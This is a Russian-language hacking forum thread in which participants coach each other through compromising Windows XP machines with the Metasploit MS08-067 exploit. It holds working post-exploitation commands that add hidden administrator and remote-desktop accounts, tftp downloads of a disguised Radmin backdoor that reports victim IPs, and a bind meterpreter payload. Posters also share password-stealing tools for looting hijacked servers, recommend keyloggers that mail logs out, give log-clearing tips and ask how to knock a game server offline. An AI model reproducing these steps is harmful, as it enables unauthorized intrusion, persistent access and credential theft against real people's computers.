как решить проблему при конекте к удаленному столу "интерактивный вход в систему на данном компьютере запрещен локальной политикой" или нужна перезагрузка компа после добавления юзера в смд ?

уже сто раз писалось , напишу ещё раз

cmd
net user user pass /add
net localgroup Administrators user /add
net localgroup "Remote Desktop Users" user /add
net accounts /maxpwage:unlimited
exit


под русскую версию ХР

net localgroup Администраторы admin /add
net localgroup "пользователи удаленного рабочего стола" admin /add

У меня так же. Ты ведь за роутером сидишь, да?
Я знакомого научил игрушкой этой пользоваться, так он раза с десятого cmd получил=)
фигасе игрушка :confused:

Тебе нужно зайти в панель управления и оттуда разрешить интерактивное ...
а как ето сделать если в панель управления не зайти , админ сидит играет в L2 , имеется только радмин и смд ?

а как ето сделать если в панель управления не зайти , админ сидит играет в L2 , имеется только радмин и смд ?
http://forum.antichat.ru/showpost.php?p=1050370&postcount=251
читай внимательней.

уже сто раз писалось , напишу ещё раз

cmd
net user user pass /add
net localgroup Administrators user /add
net localgroup "Remote Desktop Users" user /add
net accounts /maxpwage:unlimited
exit


под русскую версию ХР

net localgroup Администраторы admin /add
net localgroup "пользователи удаленного рабочего стола" admin /add
завтро попробую , видимо там админ пшол спасть и выкл комп))

у мну все шелы пропали((( надо искать статические ип...

Нужны диапазоны статических IP?

Нужны диапазоны статических IP?
можно хакать и динамический , но после релога инета IP изменится и не зайти будет в радмин или удаленку

при попытке вывести активные задачи пишит C:\>tasklist
tasklist
'tasklist' is not recognized as an internal or external command,

operable program or batch file.

а при создании учетки пишит "net localgroup Administrators user /add
System error 1378 has occurred." в чем проблема ?

а при создании учетки пишит "net localgroup Administrators user /add
System error 1378 has occurred." в чем проблема ?

Ограниченные права.

Ограниченные права.
а как можно получить тогда акк ?

а как можно получить тогда акк ?
при помощи радмина и terminal.exe

при помощи радмина и terminal.exe
tasklist не работает пишит tasklist is not recognized as an internal or external command, operable program or batch file. как тогда узнать заюзан радмин или нет ?:)

tasklist не работает пишит tasklist is not recognized as an internal or external command, operable program or batch file. как тогда узнать заюзан радмин или нет ?:)
ну например посмотреть в радмин вьювере через несколько минут идёт подключение или нет. и второй способ с помощью команды dir можно посмотреть распаковался ли r_server.exe если распаковался то значит и запустился.

Насколько я понял, без внешнего IP в инете пытаться использовать уязвимость даже и не стоит пытаться?

а у меня вот незнаю с какого черта не запускается радмин у клиента.
скачаю, потом пишу там:
sys.exe
выполняется без ошибки, но ничего не появляется в tasklist_е. (вювер точно ничего не видет)
в чем может быть дела? кстати, при передачи радмина в логах ftfp пишется:
Using local port 1067 [11/01 18:08:08.468]
Ack block 290 ignored (received twice) [11/01 18:08:54.265]
Ack block 291 ignored (received twice) [11/01 18:08:54.390]
Ack block 295 ignored (received twice) [11/01 18:08:56.031]
Ack block 689 ignored (received twice) [11/01 18:10:00.484]
Ack block 690 ignored (received twice) [11/01 18:10:00.687]
Ack block 733 ignored (received twice) [11/01 18:10:08.000]
Ack block 1104 ignored (received twice) [11/01 18:11:05.484]
Ack block 1105 ignored (received twice) [11/01 18:11:05.625]
Ack block 1116 ignored (received twice) [11/01 18:11:08.359]
Ack block 1117 ignored (received twice) [11/01 18:11:08.500]
Ack block 1122 ignored (received twice) [11/01 18:11:10.203]
Ack block 1532 ignored (received twice) [11/01 18:12:17.296]
<sys.exe>: sent 1538 blks, 787423 bytes in 251 s. 9 blks resent [11/01 18:12:19.343]

Или какая защита не может разрешить запустки sys.exe ?

а у меня вот незнаю с какого черта не запускается радмин у клиента.
скачаю, потом пишу там:
sys.exe
выполняется без ошибки, но ничего не появляется в tasklist_е. (вювер точно ничего не видет)
в чем может быть дела? кстати, при передачи радмина в логах ftfp пишется:


Или какая защита не может разрешить запустки sys.exe ?
проверь есть ли Твой sys.exe в папке куда Ты Его качал. если Ты использовал tftp то в tftp файл передаётся не в двоичном формате а по символам при этом экзешники могут портиться для принудительного включения двоичного режима заюзай ключ -i. при использованиее ftp таких проблем недолжно возникать.

dyExplode

ну вот, мен тоже кажется, что пожет повредился.
теперь как писать правильно?
tftp -i мой_IP get sys.exe
так?

P.S. да, ты прав, надо было с ключем -i отпарвить.
спасибо +!

dyExplode

ну вот, мен тоже кажется, что пожет повредился.
теперь как писать правильно?
tftp -i мой_IP get sys.exe
так?
да верно , как решить данную проблему "интерактивный вход в систему на данном компьютере запрещен локальной политикой" уже как не добавлял юзера не получается , вот тут решение но через меню пуск http://support.microsoft.com/kb/289289/ru?spid=3198&sid=global , как ето сделать через смд или радмин(радмин от компа не уходит)

Повторяю интересный вопрос:
Насколько я понял, без внешнего IP в инете пытаться использовать уязвимость даже и не стоит пытаться?

Повторяю интересный вопрос:
извеняюсь внешний ип это динамический ? если динам вписуеш его в LHOST : tge local adress и юзаеш эксплойт

Ага!Если ты не за натом,в противном случае тебе придётся форвардить порт!После чего можеш проверить
например вот тут!http://whatsmyip.org/ports/

Внешний IP это внешний IP...Он бывает динамическим и статическим.
У меня вообще "серый" IP =(

да верно , как решить данную проблему "интерактивный вход в систему на данном компьютере запрещен локальной политикой" уже как не добавлял юзера не получается , вот тут решение но через меню пуск http://support.microsoft.com/kb/289289/ru?spid=3198&sid=global , как ето сделать через смд или радмин(радмин от компа не уходит)
stopxaker уже писал
для англоязычной венды net localgroup "Remote Desktop Users" user /add
для рускоязычной net localgroup "пользователи удаленного рабочего стола" user /add
но вроде как всё эти проблемы должен решать terminal.exe

dyExplode

но вроде как всё эти проблемы должен решать terminal.exe

А termnal.exe еще и учетка создает и еще прописыват группы? я думал только патчит TCP/IP. а тогда скажи, какая учета создает и с каким паролем?

dyExplode



А termnal.exe еще и учетка создает и еще прописыват группы? я думал только патчит TCP/IP. а тогда скажи, какая учета создает и с каким паролем?
по умолчанию user:asdf пасворд:1234
но при желаниии можно изменить в файле run.cmd и заново упаковать. также придётся подредактировать файл для использования в английской венде.

dyExplode



А termnal.exe еще и учетка создает и еще прописыват группы? я думал только патчит TCP/IP. а тогда скажи, какая учета создает и с каким паролем?

учётка будет со скрытым админом : asdf пароль 1234 ;)

используя terminal.exe - пользователя спрашивает о замене оригинальных файлов винды :confused: ,
как это скрыть от пользователя?!

П.С. под 2003xp существуют подобные статьи?

используя terminal.exe - пользователя спрашивает о замене оригинальных файлов винды :confused: ,
как это скрыть от пользователя?!

П.С. под 2003xp существуют подобные статьи?
Ты немного темой ошибся! тема про terminal.exe вот сдесь https://forum.antichat.ru/threadnav99665-1-10.html и учись юзать поиск возможно ответ на Твой вопрос уже есть на форуме.

П.С. под 2003xp существуют подобные статьи?

Такой ОС не существует ;)

так я и не дождался ответа :(
в ручну перелопатил уже наверно с пол щтуки с открытым 455 портом так и не один не заработал....
можно ли автоматизировать процес использования эксплоита? например написать батник что бы отчеты в лог отправлял? можноли создать как нибудь сценарий для этого эксплоита.... чтоб скормить ему кучу IP?

Может сначала выяснить, почему не получается задействовать уязвимость в твоем случае?
Может у тебя ряд причин, не позволяющих юзать сплойт должным образом.
Хотя с другой стороны в итоге получается довольно интересная вещь;)
Придется прибегнуть к серьезному программированию, т.к. что то мне подсказывает, что обычные программы для автоматизации процессов/действий не помогут.

так я и не дождался ответа :(
в ручну перелопатил уже наверно с пол щтуки с открытым 455 портом так и не один не заработал....
можно ли автоматизировать процес использования эксплоита? например написать батник что бы отчеты в лог отправлял? можноли создать как нибудь сценарий для этого эксплоита.... чтоб скормить ему кучу IP?

в метасплоите вроде диапазон адресов указывать можно.. :rolleyes:

сегодня вот такая ОС попалась "14:20:15 - ms08_067_netapi Fingerprint: Windows 2008 Standard Service Pack 1 - lang:Unknown
14:20:15 - ms08_067_netapi Could not determine the exact language pack" такое бывает ? oO

сегодня вот такая ОС попалась "14:20:15 - ms08_067_netapi Fingerprint: Windows 2008 Standard Service Pack 1 - lang:Unknown
14:20:15 - ms08_067_netapi Could not determine the exact language pack" такое бывает ? oO
ещё раз для непонятливых сплойт работает ТОЛЬКО с windows XP sp1 sp2 sp3.

И, вроде с некоторыми 2000, нет? Если ошибаюсь - поправьте.

ещё раз для непонятливых сплойт работает ТОЛЬКО с windows XP sp1 sp2 sp3.
мне все понятно я уже добыл пару дедов , я сказал вообще разве существует такая ОС в природе

в метасплоите вроде диапазон адресов указывать можно.. :rolleyes:
а можно по конкретней? где и как?

мне все понятно я уже добыл пару дедов , я сказал вообще разве существует такая ОС в природе
конечно существует! это windosws server 2008. даже сам хотел скачать когда тока появилась. подробнее сдесь http://www.microsoft.com/windowsserver2008/en/us/default.aspx

а можно по конкретней? где и как?
Раньше небыло возможности посмотреть, ивправду в этом сплоите только 1 хост можно указывать(покрайней мере в гуи).
в ручну перелопатил уже наверно с пол щтуки с открытым 455 портом так и не один не заработал....
насколько я понял из статьи сплоит работает на порту 445, может в этом проблема?
Кстати существует сканер для поиска данной уязвимости: http://www.securitylab.ru/analytics/362523.php

Раньше небыло возможности посмотреть, ивправду в этом сплоите только 1 хост можно указывать(покрайней мере в гуи).

насколько я понял из статьи сплоит работает на порту 445, может в этом проблема?
Кстати существует сканер для поиска данной уязвимости: http://www.securitylab.ru/analytics/362523.php
тоесть прога показует только те порты (445) к каким можно получить смд ?

Прога показывает открытые порты 445. К которым есть внешний доступ.

прога показывает машины с открытым 445 портом и налие уязвимости.

по поводу порта опечатался... сдесь, сканю как и положено 445... просто если не считать ошибок... то довольно часто выводится сообщение что уязвимость задействована и ничево не происходит....
а за ссылку спасибо.... попробуем её :D
http://www.securitylab.ru/analytics/362523.php

мда..... ну очень медленная утилита.... сто пудова специально гдето пауза стоит... ех найтибы и абрать.... но в асме я ноль :(

ну вот и все :( у меня значит что то не работает... проверяю ип на этой утелите...
патч отсутствует.. рекомендуется срочно обновить систему!

запускаю метасплоит...
20:29:48 - ms08_067_netapi Triggering the vulnerability...
и на этом все заканчивается :(

по поводу порта опечатался... сдесь, сканю как и положено 445... просто если не считать ошибок... то довольно часто выводится сообщение что уязвимость задействована и ничево не происходит....
а за ссылку спасибо.... попробуем её :D
http://www.securitylab.ru/analytics/362523.php

мда..... ну очень медленная утилита.... сто пудова специально гдето пауза стоит... ех найтибы и абрать.... но в асме я ноль :(

ну вот и все :( у меня значит что то не работает... проверяю ип на этой утелите...


запускаю метасплоит...

и на этом все заканчивается :(
у меня тоже оооочень часто вулнерабл и все , не обращай внимание продолжай искать порты и пробовать до того как не появится смд

как убивать процесс из tasklist через смд ?

как убивать процесс из tasklist через смд ?
taskill /?

taskill /?
читал нечего непонял (

как убивать процесс из tasklist через смд ?
taskkill /F /IM explorer.exe

Хотел бы добавить , не сочтите за рекламу , что теперь я использую сборку радмина от ex3me (http://forum.antichat.ru/member.php?u=72811) плюсы этой сборки : всё одним файлом , ip жертвы высывается на аську , в общем Отдельный модуль отсылает IP на ICQ и снифер (на фри-хосте) отдал всего 10$ имхо копейки , ну за то теперь я не мыкаюсь как раньше , с этим радминами , то есть залил запустил и всё норм , такую сборку я думаю можно использовать и в других целях ;)

аська ex3me 43o6o6 , человек полносью нормальный и адекватный , работать с ним можно , его ранние сборки юзал пол года назад , очень рад что нашёл автора . :)

Вот описание Рамин hide-install (http://stopxaker.ru/showthread.php?t=30)

Прочитал, и не понял, а зачем все так усложнять??? Есть такая payload windows/meterpreter/bind_tcp через нее можно заливать все чо хочешь, и ни какие ftp не нужны :)

Прочитал, и не понял, а зачем все так усложнять??? Есть такая payload windows/meterpreter/bind_tcp через нее можно заливать все чо хочешь, и ни какие ftp не нужны :)
чёловеку свойственно создавать самому себе трудности. легче всего при помощи net share расшарить диск и лить что угодно и куда угодно.

net share дает только право на чтение, но не на запись файлов

или есть какие-нибудь параметры?

Дайте прямую ссылку на скачивание метасплойта, а то скачиваю что-то не то видемо...после установки даже близко не нахожу той програмы что у Тебя на скринах...Или я что то не так делаю? Сорри за тупость))

Дайте прямую ссылку на скачивание метасплойта, а то скачиваю что-то не то видемо...после установки даже близко не нахожу той програмы что у Тебя на скринах...Или я что то не так делаю? Сорри за тупость))

http://spool.metasploit.com/releases/framework-3.2.exe

хм.. я могу гордится построением своей эзернет сетью (доксис не в счет):
IPs scanned:510
Alive hosts:345
With open ports:0

Сканил по :445

хм.. я могу гордится построением своей эзернет сетью (доксис не в счет):


Сканил по :445
выберай диапозон и скань на здоровье :) _http://www.proxysecurity.com/ip-address-range.php?country=RUSSIAN+FEDERATION

Статья рулез а ещё поиск

Статья рулез а ещё поиск
поиск 445 не так и сложно , потяжелее найти ип который даст СМД :)

stopxaker

чувак, получился ! все таки проблема у меня была. щас уже нормально получаю шеллы !
респект тебе !

B1t.exe, в чём была проблема с остановкой на "Triggering the vulnerability..."
и как ты её решил?

B1t.exe, в чём была проблема с остановкой на "Triggering the vulnerability..."
и как ты её решил? ищи другой дедик!!!

ищи другой дедик!!!

Да фиг тут угадаешь , уже прочекал на 18 дедах , и ни одного открытого на 445 порт ,сейчас сижу на своём vpn не сочтите за рекламу , сканю хосты , 445 открытых пипец , а метасплойт не заводиться :( , запускаю GUI и тишина , даже не знаю , что за хрень, уже всё прочистил и в реестре и везде , не запускается и всё тут , а через web не хочу , и долго это ....

stophacker : хм..у мну все ок))

Так выкладываю специально для школьников , уже достали вопросами в аське " где взять terminal.exe , радмин , старый сплойт и сканер "

Вот всё в одном флаконе !!! terminal.exe KAV_keygen=радмин, ipscan и старый сплойт (http://stopxaker-com.na.by/sofffttt.rar)

зы походу аську надо убирать или менять :(

кстати в самом метасплоите 3.2 есть весьма шустрый сканер портов...
находится он тут:auxiliary/scanner/portscan/tcp

кстати в самом метасплоите 3.2 есть весьма шустрый сканер портов...
находится он тут:

Кстати во время установки Метасплоита автоматически можно установить сканер Nmap :

Программа Nmap предназначена для сканирования сетей с любым количеством объектов, определения состояния объектов сканируемой сети а также портов и соответствующих им служб. Для этого Nmap использует много различных методов сканирования, таких, как UDP, TCP connect(), TCP SYN (полуоткрытое), ftp proxy (прорыв через ftp), Reverse-ident, ICMP (ping), FIN, ACK, Xmas tree, SYN и NULL-сканирование. Nmap также поддерживает большой набор дополнительных возможностей, а именно: определение операционной системы удаленного хоста с использованием отпечатков стека TCP/IP, "невидимое" сканирование, динамическое вычисление времени задержки и повтор передачи пакетов, параллельное сканирование, определение неактивных хостов методом параллельного ping-опроса, сканирование с использованием ложных хостов, определение наличия пакетных фильтров, прямое (без использования portmapper) RPC-сканирование, сканирование с использованием IP-фрагментации а также произвольное указание IP-адресов и номеров портов сканируемых сетей.

Платформы: AIX, BSDI, FreeBSD, HP-UX, IRIX, Linux, NetBSD, OpenBSD, Solaris, SunOS, Windows 98/Me/2000/XP

stopxaker Ты решил проблему с запуском МС GUI ?? Если да то как?? За разъяснения буду премного благодарен.

stopxaker Ты решил проблему с запуском МС GUI ?? Если да то как?? За разъяснения буду премного благодарен.


Cорри , но я сейчас этим не занимаюсь , попробуй установить Метасплоит на другой машине или жестком диске , у меня просто после очередного эксперимента были заражены ехе файлы , это была чисто моя проблема , а так всё норм .

вопрос такой..
у меня ип (к примеру)
1.2.3.2
диапазон
1.2.3.[1-255] сканится норм у большинства порт 445 открыт
а если сканить уже не мой диапазон то ... трабла всё абсолютно недоступны порты...

что делать в данном случае?

Второй день сканю... не одного 445 порта... :(

http://www.cnews.ru/news/top/index.shtml?2009/01/19/334882

вот, именно эту уязвимость стал причиной зараженя 5 млн ПК за 4 дня !!!
Вирус Downadup, использующий уязвимость MS08-067 в ОС Windows, заразил уже около 9 млн ПК, причем более 5 млн было инфицировано за последние 4 дня, сообщает компания F-Secure.

что делать в данном случае?
Сканить с дедика.

Второй день сканю... не одного 445 порта... :(
Ещё недельку проскань,истина где то рядом:) :D

ребята ну что вы параноите ? уязвимость насколько я знаю с 2003 года , и вы думаете что что то снимите , ну конечно можно что то снять если кто то годами ставит старьё . А так везде этот баг уже залатан. Мой вам совет сканить 3389 порт и брутить тс гриндером поверьте выхлоп будет больше .

Мож хоть диапазончик подскажите... кому не жалко !!! В личку =) Буду очень благодарен :)

Мож хоть диапазончик подскажите... кому не жалко !!! В личку =) Буду очень благодарен :)

Кто ж тебе даст - ищи сам .

Ну поделитесь диапазоном ото я насканил а поподаются одни Windows 2003
ппц нах его буду дедики брутить

ппц нах его буду дедики брутить

Бруть , дело твоё , тут никто и никому ничего не навязывает !!! и в открытую ip диапозоны тебе выкладывать тоже ни кто ни будет !!, если ты до сих пор не научился находит диапазоны , то Метасплоит тебе юзать пока рано !

Кому надо диапазоны...
Идем на http://worldips.info/
Например возьмем Китай (CHN)
Находимв справа в списке CHN
Нажимаем на него мышкой
Откроется страница, на ней будут написаны диапазоны IP-адресов Китая
Копируем понравившийся вам диапазон, вставляем в сканер и сканируем
Неужели это так сложно?

Помогите разрешить проблему.
Проблема значит в следующем. В локальной сети все работает, а вот проблема когда в интернете. Сканирование показывает что 445 порт открыт. Но только ни с одним не получилось запустить эксплойт. Пишет " Exploit failed: The connection timed out" и так со всеми ip интернета.

Помогите разрешить проблему.
Проблема значит в следующем. В локальной сети все работает, а вот проблема когда в интернете. Сканирование показывает что 445 порт открыт. Но только ни с одним не получилось запустить эксплойт. Пишет " Exploit failed: The connection timed out" и так со всеми ip интернета.
ну Ты даёш... неужто все ip перепробовал?

Сообщение от dyExplode
ну Ты даёш... неужто все ip перепробовал?

смысло то в том что шелл по внутренним ip локальной сети открывает, а к ним же при подкличении интернета и коннекту к ним по внешним ip ( у них и у меня интернет включены) пишет " Exploit failed: The connection timed out"

смысло то в том что шелл по внутренним ip локальной сети открывает, а к ним же при подкличении интернета и коннекту к ним по внешним ip ( у них и у меня интернет включены) пишет " Exploit failed: The connection timed out"
если знаеш принцип работы этого эксплойта и откуда появляется шелл Я думаю Ты разберёшся. так эта проблема может возникать изза разных причин. а если Ты очередной школьник который думает что потыкав по кнопкам получит готовый дедик то можеш ити лесом..... ну или почитать топик с самого начала эти проблемы обсуждались уже не один раз.

народ, такой вопрос: мона подключиться к деду с КПК?

народ, такой вопрос: мона подключиться к деду с КПК?
получше ничего не мог придумать? думаю можно но не через удалённый рабочий стол. можно к примерру подключится к деду по ftp или http или на что фантазии хватит у мазохиста.

Привет! подскажите как мне осуществить такой замысел с помощью metasploit:
есть машина в локальной сети (возможно стоит xp sp3 и обновления осень 2008 года - октябрь, декабрь ) ни чего не расшарено на ней, но стоит сервер counter strike 1.6 build от 16 октябра 2006 года порт 27015 - хочется положить этот сервер или всю машину!

классно спасибо понравилось хотел плюсиков поставить а нолик поставился

и почему у тебя ник стопхакер если ты эти дедики сам взламываешь, получантся ты хочешь сам себя остановить?

Здравствуйте. Мх, не запускается Metasploit 3.2, в чем может быть проблема?
Дабл клик, 2 сек грузит и всё =)

Здравствуйте. Мх, не запускается Metasploit 3.2, в чем может быть проблема?
Дабл клик, 2 сек грузит и всё =)


То есть ты не можешь запустить GUI ? или вообще не запускается ?

Ничего не запускается, кроме online update и cmd shell

Если на комьютере открыт порт 139.. как произвести : взлом, повесить машину?

АХТУНГ! в школах что карантин ввели?

Здравствуйте. Мх, не запускается Metasploit 3.2, в чем может быть проблема?
Дабл клик, 2 сек грузит и всё =)
установи занова и нтивирус выклучи.

а видео есть по теме???или стои снять???и закинуть??

а видео есть по теме???или стои снять???и закинуть??

Есть желание ?! сними , и закинь ! думаю +++ будут ! ;)

Есть желание ?! сними , и закинь ! думаю +++ будут ! ;)
http://depositfiles.com/files/h0vx55z5b вот видео по этой теме пасматри ОЦЕНИ также закинул на античат!

http://depositfiles.com/files/h0vx55z5b вот видео по этой теме пасматри ОЦЕНИ также закинул на античат!
Спасиб за видео!

http://depositfiles.com/files/h0vx55z5b вот видео по этой теме пасматри ОЦЕНИ также закинул на античат!

Хорошие видео , 2 lEh молодец , для новичков то что надо !

lEh скинь содержимое temp и текстовик "заготовки"

lEh скинь содержимое temp и текстовик "заготовки"
ВОТ окончательный вариант со всеми доработками все в зборе ПАЛУЧИЛОСЬ просто ОТЛИЧНО аж самому нравица http://depositfiles.com/files/71jm67uey НЕ реально хорошее видео!!!

lEh - видео нормальное , всё понятно .
Тебе +++

Вот решил выложить может кому нужно будет Multi password recovery portable или MPR-1.0.3

Даже эта версия показывает пароли от Opera , QIP , старых версий ICQ , IE , Мoziila , и RAS

кароче вот описание

Multi Password Recovery - многофункциональное решение для Windows 95/98/W2K/XP/Vista/2K3 по расшифровке и тестировании паролей на стойкость. MPR автоматически находит и мгновенно расшифровывает пароли из более чем 60 популярных программ, при этом не требуя вмешательства пользователя. Кроме расшифровки, показывает пароли под здездочками, позволяет скопировать SAM файл, сгенерировать новый пароль, сохранить отчеты на жесткий диск. В W2K/XP/2K3 обрабатывает заблокированные для чтения файлы и показывает регистрационный ключ Windows. Для программистов доступен Plugin API, позволяющий расширить возможности программы. В архиве портативная зарегистрированная русская версия.

Возможности Multi Password Recovery:
• Все-в-одном - нет необходимости покупать/использовать несколько различных решений по восстановлению паролей
• Чтение паролей под здездочками
• Удаление сохраненных паролей
• Аудит паролей (проверка на стойкость)
• Поддержка плагинов, расширяющих функциональность программы
• Копирование SAM файла
• Обработка заблокированных для чтения файлов
• Сохранение отчетов в файл
• Встроенный мастер, позволяющий явно указать файл с паролями
• Интерфейс программы на многих языках (Русский, Английский, Украинский, Белорусский, Нидерландский, Немецкий, Венгерский, Упрощенный Китайский, Словацкий)
Multi Password Recovery расшифровует:
FTP клиенты:
- Windows/Total Commander 4.x, 6.x
- FAR Manager 1.6x, 1.7x
- WS_FTP 5, 6, 7, 8, 9 Home/Pro, 2007
- CuteFTP Home/Pro (mostly all versions)
- FlashFXP 1.x-3.x
- FileZilla 2.x
- FTP Commander Pro/Deluxe (mostly all versions)
- FTP Navigator (mostly all versions)
- BulletProof FTP Client 1.x, 2.x
- SmartFTP 1.x, 2.x
- TurboFTP 5
- FFFTP 1.x
- CoffeeCup FTP 3.x
- Core FTP 2.x
- FTPExplorer 7.x
- Frigate3 FTP 3.x
- UltraFXP 1.x
- FTPRush 1.x
- SecureFX (mostly all versions)
E-mail клиенты:
- Outlook Express 6.0
- Outlook 2000 (MSO 2000), 2002 (MSO XP), 2003 (MSO .NET)
- Mozilla Thunderbird 1.0, 1.5.x
- The Bat! v. 1.x, 2.x, 3.x
- Becky 2.x
- Eudora/Eudora Light (mostly all versions)
- Gmail Notifier (mostly all versions)
- Mail.Ru Agent 4.x
- Opera Email Client
- IncrediMail (mostly all versions)
- Group Mail Free (mostly all versions)
- Vypress Auvis 2.x
- PocoMail 3.x, 4.x
- Forte Agent 3.x
- iScribe/nScribe 1.x
- POP Peeper 3.x
- Mail Commander 8.x
Browsers:
- Opera 6.x, 7.x, 8.x, 9.x
- Mozilla Browser 1.7.x
- Internet Explorer 4, 5, 6, 7
- Mozilla Firefox (mostly all versions)
Звонилки:
- Windows Remote Access Service (RAS), VPN and Dial-up passwords
- EType Dialer 1.x
- MuxaSoft Dialer 3.0, 4.0, 4.1
- FlexibleSoft Dialer 2.x-4.x
- Advanced Dialer 2.x
- Dialer Queen 1.x
- VDialer 3
Менеджеры закачек:
- Download Master 4, 5
- GetRight 5
- FlashGet (JetCar) 1.6, 1.71, 1.8
- Internet Download Accelerator 5
Интернет пейджеры:
- QIP 2005
- Miranda IM 0.2.x, 0.3.x, 0.4.x, 0.5.x, 0.6
- ICQ 99b-2003b, Lite 4, Lite 5
- MSN Messenger 1.x-7.x
- Windows Messenger
- Yahoo! Messenger 3.x-6.x
- RQ 0.9
- Trillian 0.x, 2, 3
- AOL Instant Messenger (older versions), 6.x
- AIM Pro
- GAIM 1.x
- Odigo 4
- IM2 (Messenger 2) 1.5.x
- SIM 0.9
- Google Talk (mostly all versions)
- PSI (mostly all versions)
- Faim 0.1
- Windows Live Messenger
- Excite Private Messenger 1.x
- Gizmo Project (mostly all versions)
- Pidgin (mostly all versions)
Другие:
- Registration key from Win2k and XP
- ClubTimer 2.2-2.7
- Punto Switcher 2.5-2.9
- WinVNC 3.x
- Screen Saver Win9x
- ASP.NET Account
- Remote Desktop Connection
- The Bee 1.x
- FreeCall 3.x
- CamFrog 3.x


Ни с чем не склеена , кто не верит можете проверить залив её на VirusTotal.com , помните что все антивири на неё рычат !!!! так как показывает пароли от акков и тд и тп

Эта версия конечно есть в инете , но блин пройдя кучу регистраций , чтобы её скачать , чтобы другие не мыкались решил выложить её тут MPR-1.0.3 Portable (http://stopxaker-com.na.by/MPR-1.0.3.rar)

Просто бывает зайдя на дедик , нужно проглядеть пароли , в своё время довольно много снимал благодаря этой проге акков от мыла , асек и тд и тп ;)


ps: Себе же приобрёл версию Multi password recovery portable 1.1.3 , доволен ! :D

:cool:
Спасибо за тулзу, я как раз винду переустановить решил, и озадачился сбором своих паролей от всего, влом понимаете ли лезть по всем ящикам, а тут все в одной упаковке. =) Лови плюс.
Кстати МС удалось запустить, установив вторую винду на второй винт. Часик погудев добился заветной цмд, далее работать не стал, не до этого. =)

Кстати эта версия MPR-1.0.3 Portable весит 767кб , и вот Отчёт (http://www.virustotal.com/ru/analisis/60a339e07847d8b36e142c3919e270e2) как правило называется W32/HackToolX.KP PSWTool.Win32.MPR.015 not-a-virus:PSWTool.Win32.MPR.015

Версия Multi password recovery portable 1.1.3 должна весит 1.16мб и вот отчёт по ней ОТчёт (http://www.virustotal.com/ru/analisis/9c5afc66e73725cc8b933b8b010304df)

Должно выглядеть так как на верху , всё другое что вам попадается в инет , клеено с пинчем или другой хренью ! будете аккуратны !

да дельная прогая!
вот вапрос если удаленно не пробовал её юзать???
залить в батник ну чтото типа такова
@echo off
MPR-1.0.3.exe pas.txt
сохранит нет он в текстовом фаиле все пасы???

да дельная прогая!
вот вапрос если удаленно не пробовал её юзать???
залить в батник ну чтото типа такова
@echo off
MPR-1.0.3.exe pas.txt
сохранит нет он в текстовом фаиле все пасы???

Да вот сам сижу думаю , хорошо бы было , ну вообще то пассы он сохраняет с раширением pass.mpf

очень было бы замечательно , тем более у меня щас версия Версия Multi password recovery portable 1.1.3 от всего пароли тянет :cool:

Да вот сам сижу думаю , хорошо бы было , ну вообще то пассы он сохраняет с раширением pass.mpf

очень было бы замечательно , тем более у меня щас версия Версия Multi password recovery portable 1.1.3 от всего пароли тянет :cool:
дай ссылку на Multi password recovery portable 1.1.3
и еще палица нет она если из кансоли запустить незнаеш???

Спасибо канечно ... статья расписанна на 5+ и + скрины !
Кстати на всякий случайзаметьте, что Radmin логи хранит в :
C:/WINDOWS/system32/rserver30/Radm_log.htm
Так что либо через проксик заходите, либо чистите логи !

Спасибо канечно ... статья расписанна на 5+ и + скрины !
Кстати на всякий случайзаметьте, что Radmin логи хранит в :

Так что либо через проксик заходите, либо чистите логи !
если делать все так как навидео паказанно и пользатся все что прилогается то лог фаилов савсем не будет!!!

если делать все так как навидео паказанно и пользатся все что прилогается то лог фаилов савсем не будет!!!
http://depositfiles.com/files/71jm67uey
вот на этом видео

Спасибо канечно ... статья расписанна на 5+ и + скрины !
Кстати на всякий случайзаметьте, что Radmin логи хранит в :

Так что либо через проксик заходите, либо чистите логи !

нет радмин не юзают через прокси , его можно использовать через другого радмина , и использовать версию радмина C:/WINDOWS/system32/rserver30/Radm_log.htm думаю вообще нет смысла ! я использую сборку радмина от ex3me что очень удобно и прооблем с этим не испытываю , то залил один файл запустил и все дела ;)

Вот решил выложить может кому нужно будет Multi password recovery portable или MPR-1.0.3

Даже эта версия показывает пароли от Opera , QIP , старых версий ICQ , IE , Мoziila , и RAS

кароче вот описание



Ни с чем не склеена , кто не верит можете проверить залив её на VirusTotal.com , помните что все антивири на неё рычат !!!! так как показывает пароли от акков и тд и тп

Эта версия конечно есть в инете , но блин пройдя кучу регистраций , чтобы её скачать , чтобы другие не мыкались решил выложить её тут MPR-1.0.3 Portable (http://stopxaker-com.na.by/MPR-1.0.3.rar)

Просто бывает зайдя на дедик , нужно проглядеть пароли , в своё время довольно много снимал благодаря этой проге акков от мыла , асек и тд и тп ;)


ps: Себе же приобрёл версию Multi password recovery portable 1.1.3 , доволен ! :D
Спасибо,прога норм(Мне чемто парсер отчетов пинча напомнило :) )

Спасибо,прога норм(Мне чемто парсер отчетов пинча напомнило :) )

Ага , есть такое дело , похоже , но в отличии от пинча , MPR всегда показывает пассы , а пинч бывает приносит пустые , один раз специально протестил , то есть залил на тачку MPR и запустил пинча на этой же машине , MPR показал пароли от всего !!! а пинч принёс отчёт в котором были только номера асек и без пасса типо HEX:
и пусто

Народ залейте плз куда-нибудь метасплойт а то у мну чёто офф сайт не пашет

Молодчик! (+) Понятно все расписал. Метасплоет, вообще злая вещь в опытных руках. ;)

спасибо стопхакеру :)

я сломал свой первый африканский сервер :D

stopxaker
Поддержки прокси там действительно нету, но можно заюзать FreeCap !

Залейте Metasploit 3.2 куда-нить , оф. сайт в отключке ! Буду благодарен !

Скачать файл Metasploit framework (http://dump.ru/file/1532312)

скажите кто знает шпион клавиатурный нормальный чтоб логи на емаил сливал!

скажите кто знает шпион клавиатурный нормальный чтоб логи на емаил сливал!

EliteKeylogger и Actual Spy

to stopxaker

способ работает и на Win2000Server SP1-4, а вот к 2003Server никак не могу подобраться =(

to stopxaker

способ работает и на Win2000Server SP1-4, а вот к 2003Server никак не могу подобраться =(

Этот сплойт работает только под ХР всех версий , под Win2000Server SP1-4 и 2003Server в Метасплойте есть другие эксплойты , но под 2003Server я мало встречал их , а если такие и есть под 2003Server , то они уже не актуальны ...

Кстати, kido вирус, о котором щас трешит весь интернет, использует этот уязвимость netapi32.

EliteKeylogger и Actual Spy
СПС помогло мне!!!

Этот сплойт работает только под ХР всех версий , под Win2000Server SP1-4 и 2003Server в Метасплойте есть другие эксплойты , но под 2003Server я мало встречал их , а если такие и есть под 2003Server , то они уже не актуальны ...

я не просто так написал, что он работает под Win2000Server SP1-4
проверено. 2 сервера снял

ЗЫ: только чуть методику изменил =)

подскажите что делать с таким обнадеживающим логом...
12:23:27 - ms08_067_netapi Started bind handler
